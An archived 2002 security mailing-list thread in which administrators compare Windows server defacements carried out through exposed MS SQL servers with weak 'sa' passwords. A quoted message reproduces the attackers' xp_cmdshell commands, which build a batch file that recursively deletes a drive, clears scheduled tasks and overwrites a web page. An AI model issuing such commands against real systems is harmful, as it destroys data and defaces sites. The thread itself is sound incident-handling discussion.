Re: Windows Systems Defaced

From: Alphonse MacDonald (amacdonaldat_private)
Date: Tue May 14 2002 - 13:44:18 PDT

  • Next message: Benjamin Tomhave: "explanation of port 1433 scans..."

    
     ('binary' encoding is not supported, stored as-is)
    In-Reply-To: <BKEPKKMHGCKPBIKCIBGNGEPJCAAA.zenoneat_private>
    
    Island Press was similarly defaced, it appears access 
    occured at 5:08 on May 8th and was achieved via the MS SQL 
    server sa password. We did not have IIS running but had 
    enough files removed to require a complete rebuild. We 
    also believed all systems to have been properly patched.
    
    Were any of the other servers attacked behind a firewall 
    or were they all visible?
    
    Alphonse 
    >From: "Steve Zenone" <zenoneat_private>
    >To: <incidentsat_private>
    >Cc: <thompsonat_private>
    >Subject: RE: Windows Systems Defaced
    >Date: Thu, 2 May 2002 20:23:56 -0700
    >>Hello,
    >
    >Stephen W. Thompson wrote:
    >|> Have any of you seen similar activity? Any thoughts?
    >|
    >|Yes, we had one that matches most of your details.  These
    >|are exact matches:
    >|
    >|>  [] Damage occurred around 1600 on 5/1/2002
    >|BUT=3D>   (approx. 16:00 EDT for us)
    >|>  [] Win-popup message with "F---ing University of 
    Rochester"
    >|>       -- NOTE: not all systems running IIS
    >|>  [] Admins claimed that all systems were patched 
    correctly
    >|>  [] Most were running updated and current AV
    >
    >Thank you very much for your reply - it definitely helps!
    >
    >We have been seeing MS-SQL (1433/tcp) attacks that try 
    and execute=20
    >the following:=20
    >
    >-----BEGIN SNIPPET-----
    >    xp_cmdshell 'echo net send localhost F---ing 
    University of Rochester =
    >
    >rebooting... > rochester.bat'
    >
    >    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> 
    rochester.bat'
    >
    >    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> 
    rochester.bat'
    >
    >    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> 
    rochester.bat'
    >
    >    xp_cmdshell 'at /delete /y'
    >
    >    xp_cmdshell 'echo if exist \inetpub\wwwroot\ type=20
    >%systemroot%\rochester.html ^ 
    e:\inetpub\wwwroot\index.html >>=20
    >rochester.bat'
    >-----END SNIPPET-----
    >
    >The above commands were directed to systems that were 
    listening on
    >port 1433/tcp and accessible from the outside. It appears 
    that there
    >were multiple source IPs involved in this attack.
    >
    >At this time, I am not completely clear on how to protect 
    from this
    >attack. What I've researched is that since external 
    functions such=20
    >as xp_cmdshell, xp_startmail, xp_sendmail, and 
    xp_stopmail present=20
    >possible security risks, it is recommended to drop such 
    external=20
    >system functions.  Else, deny EXECUTE permission on them 
    to specific=20
    >users/roles if dropping these procedures would break any 
    of the SQL=20
    >Server. I haven't tested this - but does anyone on this 
    list know if
    >this is a safe and effective solution?
    >
    >Regards,
    >Steve
    >
    >
    >----------------------------------------------------------
    ------------------
    >This list is provided by the SecurityFocus ARIS analyzer 
    service.
    >For more information on this free incident handling, 
    management 
    >and tracking system please see: 
    http://aris.securityfocus.com
    >
    >
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue May 14 2002 - 14:10:31 PDT